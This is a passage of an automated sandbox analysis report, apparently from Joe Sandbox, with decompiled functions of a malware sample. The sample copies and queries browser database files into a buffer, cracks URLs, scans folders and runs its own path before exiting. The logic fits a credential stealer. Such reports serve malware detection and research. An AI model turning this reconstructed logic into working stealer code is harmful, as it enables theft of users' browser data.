Opcode Fuzzy Hash: b2e5633c00299bd2585cccd0d7583854ee72bdaf851f72599b8c2326fdce744e
Instruction Fuzzy Hash: 6341E97291021CEBCB50DBA4D989ACDB7F9EB88314F1444B6E605E3290EA34AF859F40

Uniqueness

Uniqueness Score: -1.00%

Function 0040F338 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0040F338(void* __ecx, CHAR* _a4) {
				void* _v8;
				char _v12;
				void* _t5;
				void* _t7;
				intOrPtr _t9;
				void* _t15;

				_t5 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_t15 = _t5;
				if(_t15 != 0xffffffff) {
					_t7 =  *0x6155e8(_t15,  &_v12);
					_push(_t15);
					if(_t7 != 0) {
						CloseHandle();
						_t9 = _v12;
					} else {
						CloseHandle();
						goto L1;
					}
				} else {
					L1:
					_t9 = 0;
				}
				return _t9;
			}

0x0040f353
0x0040f359
0x0040f35e
0x0040f36b
0x0040f371
0x0040f374
0x0040f37e
0x0040f384
0x0040f376
0x0040f376
0x00000000
0x0040f376
0x0040f360
0x0040f360
0x0040f360
0x0040f362
0x0040f38c

APIs

CreateFileA.KERNEL32(0040B411,80000000,00000003,00000000,00000003,00000080,00000000,%s\%s,?,?,?,0040B411,?), ref: 0040F353
GetFileSizeEx.KERNEL32(00000000,0040B411,?,?,?,0040B411,?), ref: 0040F36B
CloseHandle.KERNEL32(00000000,?,?,?,0040B411,?), ref: 0040F376
CloseHandle.KERNEL32(00000000,?,?,?,0040B411,?), ref: 0040F37E

Strings

%s\%s, xrefs: 0040F33D

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: CloseFileHandle$CreateSize
String ID: %s\%s
API String ID: 4148174661-4073750446
Opcode ID: c77cb53bfb8cbb4c421edb63e508c05662b65f59c43c34c8c3e4d5407cf2dd85
Instruction ID: fd208ac5f967f9d7ad5b786a4dd81f5998ed1341c9ae489876ce54f345b18f2f
Opcode Fuzzy Hash: c77cb53bfb8cbb4c421edb63e508c05662b65f59c43c34c8c3e4d5407cf2dd85
Instruction Fuzzy Hash: 6BF08231601614FBE7209770DC0AFDA7AAAEB48770F108132FD02B61D0D7746A418AD4

Uniqueness

Uniqueness Score: -1.00%

Function 00403907 Relevance: 7.6, APIs: 5, Instructions: 50
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00403907(void* _a4, char* _a8) {
				signed int _v16;
				void* _v20;
				signed int _v44;
				void* _v48;
				signed int _v56;
				void* _v60;
				void _v64;
				void _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				char* _t30;
				signed int _t31;
				void _t33;
				void* _t34;
				void* _t40;

				_t19 = 0x3c;
				_t33 = _t19;
				_t30 =  &_v64;
				do {
					 *_t30 = 0;
					_t30 = _t30 + 1;
					_t33 = _t33 - 1;
				} while (_t33 != 0);
				_v56 = _v56 | 0xffffffff;
				_v44 = _v44 | 0xffffffff;
				_v16 = _v16 | 0xffffffff;
				_v64 = _t19;
				_t20 = malloc(0x400); // executed
				_v48 = _t20;
				_t21 = malloc(0x400); // executed
				_v60 = _t21;
				_t22 = malloc(0x400); // executed
				_v20 = _t22;
				InternetCrackUrlA(_a8,  *0x61567c( &_v64, _t34, _t40), _a8, 0); // executed
				_t31 = 0xf;
				E00401859(memcpy(_a4,  &_v64, _t31 << 2));
				return _a4;
			}

0x0040390f
0x00403910
0x00403912
0x00403915
0x00403915
0x00403918
0x00403919
0x00403919
0x0040391c
0x00403920
0x00403924
0x00403936
0x00403939
0x0040393c
0x0040393f
0x00403942
0x00403945
0x0040394d
0x0040395f
0x0040396d
0x00403973
0x0040397e

APIs

malloc.MSVCRT ref: 00403939
malloc.MSVCRT ref: 0040393F
malloc.MSVCRT ref: 00403945
lstrlen.KERNEL32(000000FF,00000000,?), ref: 00403957
InternetCrackUrlA.WININET(000000FF,00000000), ref: 0040395F

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: malloc$CrackInternetlstrlen
String ID:
API String ID: 290264579-0
Opcode ID: ef46228e0a2bd723c86d746e95443ed02da6bf2d533f51d26e4a88d1abff3293
Instruction ID: 9484df339de3eaa66021917ae2e9d683de32f92e70cd3a1669e67658d84752cf
Opcode Fuzzy Hash: ef46228e0a2bd723c86d746e95443ed02da6bf2d533f51d26e4a88d1abff3293
Instruction Fuzzy Hash: 8A013C32D00218ABDB149BA9DC45ADEBFB8AF55320F108216E921F72E0D77456018B94

Uniqueness

Uniqueness Score: -1.00%

Function 004058A0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 270
filestringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004058A0(void* __ecx, void* __eflags, char _a4, CHAR* _a16, char _a28, intOrPtr _a40, intOrPtr _a44, char _a48) {
				char _v8;
				CHAR* _v20;
				char _v24;
				char _v36;
				char _v48;
				char _v60;
				char _v72;
				char _v84;
				char _v96;
				char _v108;
				char _v120;
				char _v132;
				char _v144;
				char _v156;
				char _v168;
				char _v180;
				char _v192;
				char _v204;
				char _v216;
				char _v228;
				char _v240;
				char _v252;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t87;
				void* _t98;
				void* _t116;
				void* _t119;
				void* _t122;
				signed int _t124;
				void* _t128;
				void* _t132;
				void* _t220;
				void* _t221;
				void* _t230;
				void* _t283;
				void* _t284;

				_t286 = __eflags;
				_t220 = __ecx;
				E004100ED( &_v20, __eflags, 0x411be1);
				E0041018C(E00410208( &_v20, _t220,  &_v36, __eflags,  *0x6153e4), _t220,  &_v20);
				E00401859(_v36);
				_t87 = E0040EEA9(0x411be1,  &_v60, _t286, 0x14);
				_pop(_t221);
				E0041018C(E004101C6( &_v20, _t221, _t87,  &_v36, _t286), _t221,  &_v20);
				E00401859(_v36);
				E00401859(_v60);
				CopyFileA(_a16, _v20, 1); // executed
				E004100ED( &_v48, _t286, 0x411be1);
				_t98 =  *0x6155c0(_v20,  &_v24); // executed
				if(_t98 == 0) {
					_t116 =  *0x61557c(_v24,  *0x61508c, 0xffffffff,  &_v8, _t98); // executed
					_t284 = _t283 + 0x14;
					if(_t116 == 0) {
						_t119 =  *0x615598(_v8);
						_t289 = _t119 - 0x64;
						if(_t119 == 0x64) {
							do {
								E004100ED( &_v36, _t289,  *0x6155b4(_v8, 0));
								_t122 =  *0x6155b4(_v8, 1);
								_pop(_t230);
								E004100ED( &_v60, _t289, _t122);
								_t124 =  *0x6155a4(_v8, 2, _a40, _a44);
								_t128 = E0040566F(_t124,  &_v204,  *0x6155ac(), _v8, 2);
								_t284 = _t284 + 0x20;
								E0041018C(_t128, _t230,  &_v48);
								E00401859(_v204);
								_t132 =  *0x61567c(_v48);
								_t290 = _t132 - 1;
								if(_t132 > 1) {
									E0041018C(E00410208(0x6159e0, _t230,  &_v180, _t290,  *0x6152c8), _t230, 0x6159e0);
									E00401859(_v180);
									E0041018C(E004101C6(0x6159e0, _t230,  &_a28,  &_v108, _t290), _t230, 0x6159e0);
									E00401859(_v108);
									E0041018C(E00410208(0x6159e0, _t230,  &_v228, _t290, "\n"), _t230, 0x6159e0);
									E00401859(_v228);
									E0041018C(E00410208(0x6159e0, _t230,  &_v132, _t290,  *0x61507c), _t230, 0x6159e0);
									E00401859(_v132);
									E0041018C(E004101C6(0x6159e0, _t230,  &_a4,  &_v72, _t290), _t230, 0x6159e0);
									E00401859(_v72);
									E0041018C(E00410208(0x6159e0, _t230,  &_v156, _t290, "\n"), _t230, 0x6159e0);
									E00401859(_v156);
									E0041018C(E00410208(0x6159e0, _t230,  &_v252, _t290,  *0x6150b4), _t230, 0x6159e0);
									E00401859(_v252);
									E0041018C(E004101C6(0x6159e0, _t230,  &_v36,  &_v84, _t290), _t230, 0x6159e0);
									E00401859(_v84);
									E0041018C(E00410208(0x6159e0, _t230,  &_v96, _t290, "\n"), _t230, 0x6159e0);
									E00401859(_v96);
									E0041018C(E00410208(0x6159e0, _t230,  &_v120, _t290,  *0x615044), _t230, 0x6159e0);
									E00401859(_v120);
									E0041018C(E004101C6(0x6159e0, _t230,  &_v60,  &_v144, _t290), _t230, 0x6159e0);
									E00401859(_v144);
									E0041018C(E00410208(0x6159e0, _t230,  &_v168, _t290, "\n"), _t230, 0x6159e0);
									E00401859(_v168);
									E0041018C(E00410208(0x6159e0, _t230,  &_v192, _t290,  *0x6151f0), _t230, 0x6159e0);
									E00401859(_v192);
									E0041018C(E004101C6(0x6159e0, _t230,  &_v48,  &_v216, _t290), _t230, 0x6159e0);
									E00401859(_v216);
									_t239 = "\n";
									E0041018C(E00410208(0x6159e0, _t230,  &_v240, _t290, "\n"), _t230, 0x6159e0);
									E00401859(_v240);
									E0041018C(E00410208(0x6159e0, _t230,  &_v264, _t290, _t239), _t230, 0x6159e0);
									E00401859(_v264);
								}
								E00401859(_v60);
								E00401859(_v36);
								_push(_v8);
							} while ( *0x615598() == 0x64);
						}
					}
					 *0x61559c(_v8);
					 *0x6155c4(_v24); // executed
				}
				E00401859(_v48);
				DeleteFileA(_v20); // executed
				E00401859(_v20);
				E00401859(0);
				E00401859(0);
				E00401859(_a4);
				E00401859(_a16);
				E00401859(_a28);
				return E004016CC( &_a48);
			}

0x004058a0
0x004058a0
0x004058b5
0x004058ce
0x004058d6
0x004058e0
0x004058e7
0x004058f6
0x004058fe
0x00405906
0x00405913
0x0040591d
0x00405929
0x00405933
0x00405949
0x0040594f
0x00405954
0x0040595d
0x00405964
0x00405967
0x00405972
0x00405983
0x0040598d
0x00405994
0x00405999
0x004059a9
0x004059c9
0x004059ce
0x004059d4
0x004059df
0x004059e7
0x004059ed
0x004059f0
0x00405a0b
0x00405a16
0x00405a2a
0x00405a32
0x00405a4b
0x00405a56
0x00405a6d
0x00405a75
0x00405a89
0x00405a91
0x00405aaa
0x00405ab5
0x00405acf
0x00405ada
0x00405aee
0x00405af6
0x00405b0c
0x00405b14
0x00405b2b
0x00405b33
0x00405b4a
0x00405b55
0x00405b6e
0x00405b79
0x00405b93
0x00405b9e
0x00405bb5
0x00405bc0
0x00405bc5
0x00405bda
0x00405be5
0x00405bfa
0x00405c05
0x00405c05
0x00405c0d
0x00405c15
0x00405c1a
0x00405c24
0x00405972
0x00405967
0x00405c30
0x00405c3a
0x00405c40
0x00405c44
0x00405c4c
0x00405c55
0x00405c5c
0x00405c63
0x00405c6b
0x00405c73
0x00405c7b
0x00405c8c

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

Part of subcall function 0040EEA9: GetSystemTime.KERNEL32(?,00411BE1,00000000,?,?,?,?,?,?,?,00403A28,00000014), ref: 0040EECE

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

CopyFileA.KERNEL32(?,?,00000001), ref: 00405913
DeleteFileA.KERNEL32(?,?), ref: 00405C4C

Part of subcall function 0040566F: memcmp.MSVCRT ref: 0040568D
Part of subcall function 0040566F: memset.MSVCRT ref: 004056BF
Part of subcall function 0040566F: LocalAlloc.KERNEL32(00000040,-000000E1), ref: 004056F5

lstrlen.KERNEL32(?), ref: 004059E7

Strings

Ya, xrefs: 0040596D

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpy$Filelstrcatlstrlen$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID: Ya
API String ID: 317260277-3053265743
Opcode ID: 7713c2e848db09523bbcb0df386001a69eed6e4f55285a37cd716262e6d5f6c7
Instruction ID: c2271f17ffbc56d4898688ef782ce649cc0c9600479392d2b99157ab5d99d361
Opcode Fuzzy Hash: 7713c2e848db09523bbcb0df386001a69eed6e4f55285a37cd716262e6d5f6c7
Instruction Fuzzy Hash: 74A1EA32D00219EBCB10BB66DC46ACDB775EF04308F05957BF51677162CA7DAE858B88

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040D7AD() {
				CHAR* _v8;
				char _v20;
				int _v48;
				int _v52;
				int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				int _v72;
				int _v76;
				char _v80;
				char _v92;
				char _v104;
				char _v1104;
				intOrPtr _t59;
				intOrPtr _t60;
				void* _t80;
				void* _t100;

				_v8 =  &_v1104;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v80;
				memset(_v8, 0, 0x3c << 0);
				GetModuleFileNameA(0,  &_v1104, 0x104);
				E004100ED( &_v20, _t100,  *0x615388);
				E0041018C(E00410208( &_v20, 0,  &_v92, _t100,  &_v1104), 0,  &_v20);
				E00401859(_v92);
				E0041018C(E00410208( &_v20, 0,  &_v104, _t100,  *0x6151fc), 0,  &_v20);
				E00401859(_v104);
				_t59 =  *0x61548c; // 0x6bc160
				_v68 = _t59;
				_t60 =  *0x6154f8; // 0x6bb188
				_v64 = _t60;
				_v80 = 0x3c;
				_v76 = 0;
				_v72 = 0;
				_v60 = _v20;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				 *0x6157b4( &_v80, _t80); // executed
				_v8 =  &_v80;
				memset(_v8, 0, 0x3c << 0);
				_v8 =  &_v1104;
				memset(_v8, 0, 0x3e8 << 0);
				E00401859(_v20);
				ExitProcess(0);
			}

0x0040d7bf
0x0040d7cc
0x0040d7d1
0x0040d7de
0x0040d7ef
0x0040d7fe
0x0040d818
0x0040d820
0x0040d839
0x0040d841
0x0040d846
0x0040d84e
0x0040d851
0x0040d856
0x0040d85d
0x0040d864
0x0040d867
0x0040d86a
0x0040d86d
0x0040d870
0x0040d873
0x0040d876
0x0040d87f
0x0040d88c
0x0040d894
0x0040d8a1
0x0040d8a5
0x0040d8ab

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 0040D7EF

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

ShellExecuteEx.SHELL32(?), ref: 0040D876
ExitProcess.KERNEL32 ref: 0040D8AB

Strings

<, xrefs: 0040D85D

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 99dfe4f1f22f15096d16817fff8ab032ddcb3fc9b4a5fa60a8fdd7db9ab51198
Instruction ID: f8fb6f42361e6b488eec7c5fff256af6a9dd74ddbe5e3f1aab80f49c642f015f
Opcode Fuzzy Hash: 99dfe4f1f22f15096d16817fff8ab032ddcb3fc9b4a5fa60a8fdd7db9ab51198
Instruction Fuzzy Hash: CD319371D0121DEBCB40EFA5DD80ACDBBB9AB48304F54846AE615F3250DB746E459F84

Uniqueness

Uniqueness Score: -1.00%

Function 0040613C Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 278
stringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040613C(void* __ecx, void* __eflags, intOrPtr _a4, char _a16, char _a28, char _a40, void* _a120) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v32;
				char _v44;
				char _v56;
				char _v68;
				char _v80;
				char _v92;
				char _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t110;
				char _t128;
				void* _t131;
				void* _t141;
				void* _t151;
				void* _t189;
				void* _t193;
				void* _t194;
				void* _t206;
				void* _t219;
				void* _t248;
				void* _t250;
				void* _t256;
				void* _t258;
				void* _t260;
				char* _t273;
				void* _t311;
				void* _t312;
				void* _t313;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t319;

				_t248 = __ecx;
				_t273 =  &_v44;
				E004100ED(_t273, __eflags, 0x411be1);
				_t321 = _a120;
				_push( *0x615248);
				_t110 = _t273;
				if(_a120 == 0) {
					E0041018C(E00410208(E004101C6(E00410208(E004101C6(E00410208(E00410208(_t110, _t248,  &_v104, __eflags,  *0x6153f4), _t248,  &_v92, __eflags, 0x411be4), _t248,  &_a28,  &_v32, __eflags), _t248,  &_v56, __eflags, "_"), _t248,  &_a16,  &_v68, __eflags), _t248,  &_v80, __eflags), _t248,  &_v44);
					E00401859(_v80);
					E00401859(_v68);
					E00401859(_v56);
					E00401859(_v32);
					E00401859(_v92);
					_t128 = _v104;
				} else {
					E0041018C(E00410208(E004101C6(E00410208(E00410208(_t110, _t248,  &_v80, _t321,  *0x6153f4), _t248,  &_v68, _t321, 0x411be4), _t248,  &_a28,  &_v32, _t321), _t248,  &_v56, _t321), _t248,  &_v44);
					E00401859(_v56);
					E00401859(_v32);
					E00401859(_v68);
					_t128 = _v80;
				}
				E00401859(_t128);
				_t131 =  *0x6155c0(_a4,  &_v16); // executed
				_pop(_t250);
				if(_t131 == 0) {
					_t189 =  *0x61557c(_v16,  *0x6154c8, 0xffffffff,  &_v8, _t131); // executed
					_t311 = _t311 + 0x14;
					_t323 = _t189;
					if(_t189 == 0) {
						E004100ED( &_v32, _t323, 0x411be1);
						while(1) {
							_t193 =  *0x615598(_v8);
							_pop(_t256);
							if(_t193 != 0x64) {
								break;
							}
							_t194 =  *0x6155b4(_v8, 0);
							_pop(_t258);
							E004100ED( &_v56, __eflags, _t194);
							E0041018C(E004101C6( &_v32, _t258,  &_v56,  &_v104, __eflags), _t258,  &_v32);
							E00401859(_v104);
							E0041018C(E00410208( &_v32, _t258,  &_v92, __eflags, " "), _t258,  &_v32);
							E00401859(_v92);
							_t206 =  *0x6155b4(_v8, 1);
							_pop(_t260);
							E0041018C(E00410208( &_v32, _t260,  &_v80, __eflags, _t206), _t260,  &_v32);
							E00401859(_v80);
							E0041018C(E00410208( &_v32, _t260,  &_v68, __eflags, "\n"), _t260,  &_v32);
							E00401859(_v68);
							E00401859(_v56);
						}
						_t219 =  *0x61567c(_v32);
						_t325 = _t219 - 5;
						if(_t219 > 5) {
							_push( *0x61567c(_v32));
							_push(_v32);
							_t318 = _t311 - 0xc;
							E0041011F( &_v44, _t256, _t318, _t325);
							_t319 = _t318 - 0x50;
							E004016EB( &_a40, _t319);
							_push( &_v104);
							E00403F95(_t256, _t325);
							_t311 = _t319 + 0x68;
							E00401859(_v104);
						}
						E00401859(_v32);
						E00401859(0);
					}
					 *0x61559c(_v8);
					 *0x6155c4(_v16); // executed
					_pop(_t250);
				}
				E004100ED( &_v32, 0, "browsers");
				E0041018C(E004101C6(E00410208( &_v32, _t250,  &_v92, 0, 0x411be4), _t250,  &_a28,  &_v104, 0), _t250,  &_v32);
				E00401859(_v104);
				E00401859(_v92);
				_t141 =  *0x61567c(_a16);
				_t327 = _t141 - 1;
				if(_t141 > 1) {
					E0041018C(E004101C6(E00410208( &_v32, _t250,  &_v92, _t327, 0x411be4), _t250,  &_a16,  &_v104, _t327), _t250,  &_v32);
					E00401859(_v104);
					E00401859(_v92);
				}
				E0041018C(E00410208(E00410208( &_v32, _t250,  &_v92, _t327, 0x411be4), _t250,  &_v104, _t327,  *0x6153fc), _t250,  &_v32);
				E00401859(_v104);
				E00401859(_v92);
				_t312 = _t311 - 0xc;
				E004100ED(_t312, _t327, _a4);
				_t151 = E00405394( &_v20,  &_v12); // executed
				_t313 = _t312 + 0xc;
				_t328 = _t151;
				if(_t151 != 0) {
					_push(_v12);
					_push(_v20);
					_t316 = _t313 - 0xc;
					E0041011F( &_v32, _t250, _t316, _t328);
					_t317 = _t316 - 0x50;
					E004016EB( &_a40, _t317);
					_push( &_v104); // executed
					E00403F95(_t250, _t328); // executed
					_t313 = _t317 + 0x68;
					E00401859(_v104);
				}
				E00401859(_v32);
				_a120 =  &_v20;
				memset(_a120, 0, 4 << 0);
				_a120 =  &_v12;
				memset(_a120, 0, 4 << 0);
				E00401859(_v44);
				E00401859(0);
				E00401859(0);
				E00401859(_a4);
				E00401859(_a16);
				E00401859(_a28);
				return E004016CC( &_a40);
			}

0x0040613c
0x0040614b
0x0040614e
0x00406153
0x00406157
0x0040615d
0x0040615f
0x004061fd
0x00406205
0x0040620d
0x00406215
0x0040621d
0x00406225
0x0040622a
0x00406161
0x00406192
0x0040619a
0x004061a2
0x004061aa
0x004061af
0x004061af
0x0040622d
0x00406239
0x00406240
0x00406243
0x00406259
0x0040625f
0x00406262
0x00406264
0x0040626e
0x0040631c
0x0040631f
0x00406325
0x00406329
0x00000000
0x00000000
0x0040627d
0x00406284
0x00406289
0x0040629e
0x004062a6
0x004062be
0x004062c6
0x004062d0
0x004062d7
0x004062e7
0x004062ef
0x00406307
0x0040630f
0x00406317
0x00406317
0x00406332
0x00406338
0x0040633b
0x00406346
0x00406347
0x0040634d
0x00406352
0x00406357
0x0040635f
0x00406367
0x00406368
0x00406370
0x00406373
0x00406373
0x0040637b
0x00406382
0x00406382
0x0040638a
0x00406393
0x0040639a
0x0040639a
0x004063a3
0x004063c7
0x004063cf
0x004063d7
0x004063df
0x004063e5
0x004063e8
0x00406404
0x0040640c
0x00406414
0x00406414
0x00406436
0x0040643e
0x00406446
0x0040644b
0x00406453
0x0040645e
0x00406463
0x00406466
0x00406468
0x0040646a
0x00406470
0x00406473
0x00406478
0x0040647d
0x00406485
0x0040648d
0x0040648e
0x00406496
0x00406499
0x00406499
0x004064a1
0x004064a9
0x004064b6
0x004064bb
0x004064c8
0x004064cd
0x004064d4
0x004064db
0x004064e3
0x004064eb
0x004064f3
0x00406504

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

lstrlen.KERNEL32(?), ref: 00406332
lstrlen.KERNEL32(?), ref: 00406340

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

lstrlen.KERNEL32(?,00411BE4,browsers), ref: 004063DF

Strings

browsers, xrefs: 0040639B

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpylstrlen$lstrcat
String ID: browsers
API String ID: 1892114191-3721921974
Opcode ID: f9c37800773def9a832500372eb200fdae552658113047dd6d16e6ee66fc2f8e
Instruction ID: 4696f4c219ab2299de089280cead14862f1410d740364286d9465cb053eb6f42
Opcode Fuzzy Hash: f9c37800773def9a832500372eb200fdae552658113047dd6d16e6ee66fc2f8e
Instruction Fuzzy Hash: 3CB1C932D00219DBCF00FBA6DD469DDB775EF04308B11853BF525B71A1DA79AE868B88

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2B7 Relevance: 5.1, APIs: 4, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040C2B7(void* __eflags, char _a4) {
				void* _v8;
				char _v20;
				char _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t58;

				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				 *0x61575c( &_v284,  *((intOrPtr*)(E0040EFE3( &_v20, 0x1a))));
				E00401859(_v20);
				 *0x61575c( &_v284, 0x411be4);
				 *0x61575c( &_v284,  *0x61550c);
				 *0x61575c();
				_t60 = _t58 + 0xc - 0x50;
				_t43 =  &_a4;
				E004016EB( &_a4, _t58 + 0xc - 0x50);
				E0040BF33(0x411be1,  &_v284,  *0x6152fc,  *0x61550c,  &_v284); // executed
				E004016EB( &_a4, _t60 + 0x10);
				E0040BF33(0x411be1,  &_v284,  *0x6153f8,  *0x61550c, 0x411be4); // executed
				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				return E004016CC(_t43);
			}

0x0040c2c9
0x0040c2d6
0x0040c2ec
0x0040c2f5
0x0040c307
0x0040c31a
0x0040c328
0x0040c32e
0x0040c331
0x0040c336
0x0040c354
0x0040c35e
0x0040c377
0x0040c385
0x0040c392
0x0040c39f

APIs

Part of subcall function 0040EFE3: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00411BE1,?), ref: 0040F014

lstrcat.KERNEL32(?,00000000), ref: 0040C2EC
lstrcat.KERNEL32(?,00411BE4), ref: 0040C307
lstrcat.KERNEL32(?), ref: 0040C31A
lstrcat.KERNEL32(?,00411BE4), ref: 0040C328

Part of subcall function 0040BF33: wsprintfA.USER32 ref: 0040BF4E
Part of subcall function 0040BF33: FindFirstFileA.KERNEL32(?,?), ref: 0040BF65
